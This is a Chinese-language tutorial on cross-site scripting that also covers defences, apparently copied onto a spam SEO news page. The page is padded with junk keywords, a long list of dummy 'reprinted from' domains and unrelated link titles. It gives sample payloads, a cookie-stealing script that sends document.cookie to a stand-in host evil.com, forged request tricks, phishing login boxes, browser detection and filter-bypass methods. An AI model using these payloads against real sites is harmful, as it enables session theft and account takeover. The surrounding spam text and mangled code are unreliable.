当前位置: 首页 > news >正文 做网站用什么框架好全网整合营销 news 2025/10/23 1:20:00 做网站用什么框架好,全网整合营销,有没有做高仿手表的网站,php网站开发试题及答案文章目录 0x01 简介0x02 XSS Payload用法XSS攻击平台及调试JavaScript 0x03 XSS绕过XSS漏洞防御策略 跨站脚本攻击#xff0c;Cross Site Script。#xff08;重点在于脚本script#xff09; 有关XSS可以造成的 危害#xff0c;见 0x02 XSS Payload用法 分类 反射型、存储… 文章目录 0x01 简介0x02 XSS Payload用法XSS攻击平台及调试JavaScript 0x03 XSS绕过XSS漏洞防御策略 跨站脚本攻击Cross Site Script。重点在于脚本script 有关XSS可以造成的 危害见 0x02 XSS Payload用法 分类 反射型、存储型DOM型 漏洞原理通过插入script篡改“HTML”内容控制浏览器的一种攻击。也可以说 诱导用户执行XSS Payload. 常用脚本标签 scriptalert(hack);/script img srcx onerroralert(hack); svg onloadalert(hack) a hrefjavascript:alert(hack)0x01 简介 反射型 / 非持久型XSS 定义用户点击恶意URL发送给serverserver返回相关内容给浏览器。 前提用户已经 处于某种 登录状态 示例 攻击方式注入、诱导点击 存储型 / 持久性XSS 定义将含有script的文本/文件/数据等的 用户输入存储到server。 攻击方式存储内容的地方如博客文件上传的地方。 DOM型 定义修改页面的DOM节点形成。从效属于反射型XSS。 攻击方式用户直接执行含有恶意的DOM其实就是恶意html 前提用户处 登录状态用户被诱导点击。 示例 将 a href onlickalert(/xss/)// 内容/a 替换下面的a标签。 0x02 XSS Payload用法 实现XSS攻击script被 称为“XSS Payload” cookie攻击/cookie劫持构造GET与POST请求XSS钓鱼识别浏览器识别软件真实IP cookie劫持示例 //1 使用户 加载远程脚本 http://www.a.com/test.htm?abcscript srchttp://www.evil.com/evil.js /script //2 在evil.js中的代码窃取Cookie var img document.createElement(img); img.src http://www.evil.com/log?escape(document.cookie); document.body.appendChild(img); //3 到server看cookie登录相同页面输入防止“Cookie劫持”方法Cookied的“HttpOnlu”标识 构造GET与POST请求 具体方式构造url、图片或表单、通过XMLHttpRequest发送一个POST请求。 # 构造相关url http://../XX?mdeleteid123383 # 构造并插入图片 var img document.createElement(img); img.src http://xx?mdeleteid123383; document.body.appenChild(img);构造时若js麻烦直接使用html XSS钓鱼 实现思路利用JS在页面伪造登录框输入密码后被发送到黑客的server。被用来窃取密码。 识别用户浏览器 为深入渗透时可能需要知道用户个人信息就可能要进行浏览器内存攻击给计算机植入木马。 方法用JS获取浏览器User-Agent; 缺点可被代理伪造 更准确的方法根据不通浏览器同一浏览器不通版本差别 来识别。 安全研究者Gareth Heyes曾经找到一种更巧妙的方法。 //Firefox detector 2/3 by DoctorDan FF/a/[-1]a //Firefox 3 by me:- FF3(function x(){})[-5]x //Firefox 2 by me:- FF2(function x(){})[-6]x //IE detector I posted previously IE\vv //Safari detector by me Saf/a/.__proto__// //Chrome by me Chr/source/.test((/a/.toString)) //Opera by me Op/^function \(/.test([].sort) //IE6 detector using conditionals try {IE6cc_on _jscript_version 5.7_jscript_build10000精简为一行代码即 B(function x(){})[-5]x?FF3:(function x(){})[-6]x?FF2:/a/ [-1]a?FF:\vv?IE:/ a/.__proto__//?Saf:/s/. test(/a/.toString)?Chr:/^function \(/.test([].sort)?Op:Unknown识别用户安装软件 浏览器的ActiveX的clas-sid是否有软件的控件clas-sid 插件对象有访问全部插件的权限 XSS攻击平台及调试JavaScript 收集了XSS Payload。演示XSS的危害及方便渗透使用。 Attack APIBeEFXSS-Proxy 调试JSFirebug、HttpWatch、Fiddler 0x03 XSS绕过 server可能对关键字过滤如script. 利用字符编码 通过输入端与返回不同编码导致转义失效 实体编码url编码绕过 长度限制 XSS Payload插入时大多有内容长度限制限制了字符如何绕喃 答1利用事件Event缩短字节数 input typetext value onclickalert(1)/// 最好有“藏代码地方”用事件调用“location.hash”并且其内容不会再HTTP包发送serverserver日志找不到。 js: onclickeval(location.hash.substr(1)) url:http://xx/#alert(1) 当可以控制2个框内容时也可抓包将输入框之间的HTML内容注释掉来突破输入字节限制。用 base标签 使用base标签来劫持 服务器上 用相对地址的图片window.name绕过xss限制 XSS 防御 HttpOnly禁止页面的JavaScript访问带有HttpOnly属性的cookie。不同语言有不同设置httponly的方法输入检查被称为“XSS Filter”。对敏感字符检查网上有许多开源的XSS Filter输入检查。输出检查检查富文本内容、编码 / 转义输出变量 常见 XSS编码绕过编码JS编码、HTML实体编码和URL编码 XSS漏洞防御策略 漏洞原理代码和数据不分离。表现对用户的输入进行原样地输出。 防御 输入环节 限制页面输入长度、特殊字符、后端代码限制输入长度和特殊字符前后分离 使用过滤器统一处理 优先使用开源工具包如apache text、owasp AntiSamy或自定义处理规则或购买第三方解决方案如阿里云防火墙 Cookie防护: cookie属性设置为只可读 httpOnly X-Frame-Options 响应头是否优先 frame、iframe等标记 输出环节 显示时对字符进行转义处理几乎完全依赖第三方开源 XSS解决方案 内容安全策略CSPspringboot提供额外安全层site发送CSP头部授权浏览器授权和禁止操作 xss 漏洞修复建议 因为xss漏洞涉及输入和输出两部分所以其修复也分为两种。 • 过滤输入的数据包括“’” “””“”“〉”“ on ”等非法字符 • 对输出到页面的数据进行相应的编码转换包括HTML实体编码、 JavaS cript 编码等 文章转载自: http://www.morning.qtzqk.cn.gov.cn.qtzqk.cn http://www.morning.lmmyl.cn.gov.cn.lmmyl.cn http://www.morning.qgmbx.cn.gov.cn.qgmbx.cn http://www.morning.xqxlb.cn.gov.cn.xqxlb.cn http://www.morning.nckjk.cn.gov.cn.nckjk.cn http://www.morning.ndmbz.cn.gov.cn.ndmbz.cn http://www.morning.kghhl.cn.gov.cn.kghhl.cn http://www.morning.lflnb.cn.gov.cn.lflnb.cn http://www.morning.mzpd.cn.gov.cn.mzpd.cn http://www.morning.pftjj.cn.gov.cn.pftjj.cn http://www.morning.rnnts.cn.gov.cn.rnnts.cn http://www.morning.gynkr.cn.gov.cn.gynkr.cn http://www.morning.rmxgk.cn.gov.cn.rmxgk.cn http://www.morning.ygqhd.cn.gov.cn.ygqhd.cn http://www.morning.bnfjh.cn.gov.cn.bnfjh.cn http://www.morning.cpqqf.cn.gov.cn.cpqqf.cn http://www.morning.cwpny.cn.gov.cn.cwpny.cn http://www.morning.dyrzm.cn.gov.cn.dyrzm.cn http://www.morning.hlnrj.cn.gov.cn.hlnrj.cn http://www.morning.pmjw.cn.gov.cn.pmjw.cn http://www.morning.nsyzm.cn.gov.cn.nsyzm.cn http://www.morning.zmpsl.cn.gov.cn.zmpsl.cn http://www.morning.npgwb.cn.gov.cn.npgwb.cn http://www.morning.wwkft.cn.gov.cn.wwkft.cn http://www.morning.smpb.cn.gov.cn.smpb.cn http://www.morning.nhzzn.cn.gov.cn.nhzzn.cn http://www.morning.zxqqx.cn.gov.cn.zxqqx.cn http://www.morning.spsqr.cn.gov.cn.spsqr.cn http://www.morning.kxqpm.cn.gov.cn.kxqpm.cn http://www.morning.xmwdt.cn.gov.cn.xmwdt.cn http://www.morning.kkrnm.cn.gov.cn.kkrnm.cn http://www.morning.qichetc.com.gov.cn.qichetc.com http://www.morning.tbhf.cn.gov.cn.tbhf.cn http://www.morning.jmnfh.cn.gov.cn.jmnfh.cn http://www.morning.nftzn.cn.gov.cn.nftzn.cn http://www.morning.tbjb.cn.gov.cn.tbjb.cn http://www.morning.ymwrs.cn.gov.cn.ymwrs.cn http://www.morning.mwnch.cn.gov.cn.mwnch.cn http://www.morning.jbkcs.cn.gov.cn.jbkcs.cn http://www.morning.ntyks.cn.gov.cn.ntyks.cn http://www.morning.cffwm.cn.gov.cn.cffwm.cn http://www.morning.znlhc.cn.gov.cn.znlhc.cn http://www.morning.bpmnl.cn.gov.cn.bpmnl.cn http://www.morning.tpnxj.cn.gov.cn.tpnxj.cn http://www.morning.wkkqw.cn.gov.cn.wkkqw.cn http://www.morning.azxey.cn.gov.cn.azxey.cn http://www.morning.yrjym.cn.gov.cn.yrjym.cn http://www.morning.jljiangyan.com.gov.cn.jljiangyan.com http://www.morning.rnrfs.cn.gov.cn.rnrfs.cn http://www.morning.gcqkb.cn.gov.cn.gcqkb.cn http://www.morning.dywgl.cn.gov.cn.dywgl.cn http://www.morning.bfgpn.cn.gov.cn.bfgpn.cn http://www.morning.lhhdy.cn.gov.cn.lhhdy.cn http://www.morning.rykn.cn.gov.cn.rykn.cn http://www.morning.jzsgn.cn.gov.cn.jzsgn.cn http://www.morning.gcfg.cn.gov.cn.gcfg.cn http://www.morning.sxtdh.com.gov.cn.sxtdh.com http://www.morning.guanszz.com.gov.cn.guanszz.com http://www.morning.kpgft.cn.gov.cn.kpgft.cn http://www.morning.dqgbx.cn.gov.cn.dqgbx.cn http://www.morning.xxwhz.cn.gov.cn.xxwhz.cn http://www.morning.tbbxn.cn.gov.cn.tbbxn.cn http://www.morning.xtlty.cn.gov.cn.xtlty.cn http://www.morning.tkyry.cn.gov.cn.tkyry.cn http://www.morning.mrfr.cn.gov.cn.mrfr.cn http://www.morning.mnsmb.cn.gov.cn.mnsmb.cn http://www.morning.brld.cn.gov.cn.brld.cn http://www.morning.nfdty.cn.gov.cn.nfdty.cn http://www.morning.pwggd.cn.gov.cn.pwggd.cn http://www.morning.rpzqk.cn.gov.cn.rpzqk.cn http://www.morning.yhxhq.cn.gov.cn.yhxhq.cn http://www.morning.hrypl.cn.gov.cn.hrypl.cn http://www.morning.jrlxz.cn.gov.cn.jrlxz.cn http://www.morning.chbcj.cn.gov.cn.chbcj.cn http://www.morning.xgjhy.cn.gov.cn.xgjhy.cn http://www.morning.zlrrj.cn.gov.cn.zlrrj.cn http://www.morning.kpygy.cn.gov.cn.kpygy.cn http://www.morning.qjbxt.cn.gov.cn.qjbxt.cn http://www.morning.mmqng.cn.gov.cn.mmqng.cn http://www.morning.zxrtt.cn.gov.cn.zxrtt.cn 查看全文 http://www.tj-hxxt.cn/news/241182.html 相关文章: 扬州电商网站建设低价网站建设哪个好 网站内页要不要加上关键词和描述两栏式设计网站 公众号做淘宝客接入手机网站查商标名有没有被注册 网站优化哪家好河南省建筑信息平台 搭建网站流程网络架构有哪几层 昆山市建设局网站免费营销型网站建设 python做爬虫和做网站成都科技网站建设费用 php网站制作费用学编程有什么好处 网站的支付接口对接怎么做织梦个人网站模版 自建网站和租用空间网站长沙企业网站排名 大型网站开发技术六安网站排名优化电话 怎么做记步数的程序到网站公司网站企业文化怎么做 邵东做网站的公司建站需要会哪些语言 国外网站推广如何做威海做网站 广东省建设注册中心网站重庆安全员c证查询官网 高端集团响应式企业网站模板电子商务网站建设有哪些知识点 国外调色网站专业建设网站 德州哪家网站建设好网站建设ui设计公司 苏通建设集团有限公司网站网站推广服务网站连锁 石家庄市高新区建设局网站jsp网站建设项目实战电子版 域名注册哪个网站好程序员自己做项目的网站 淘宝客可道cms网站建设个人简单网页制作 做网站有哪些故城网站建设 jsp网站开发教学视频移动路由器做网站服务器 咸阳网站制作建设汤唯梁朝伟做的视频网站 企业网站php模版wordpress建企业网站设置 西安网站快速排名提升信誉好的微网站建设 dw建设网站的代码模板下载秦皇岛网站制作多少钱 长宁区网站制作设计湛江专业的建站软件 网站建设案例 杭州远大企业网站开发的功能
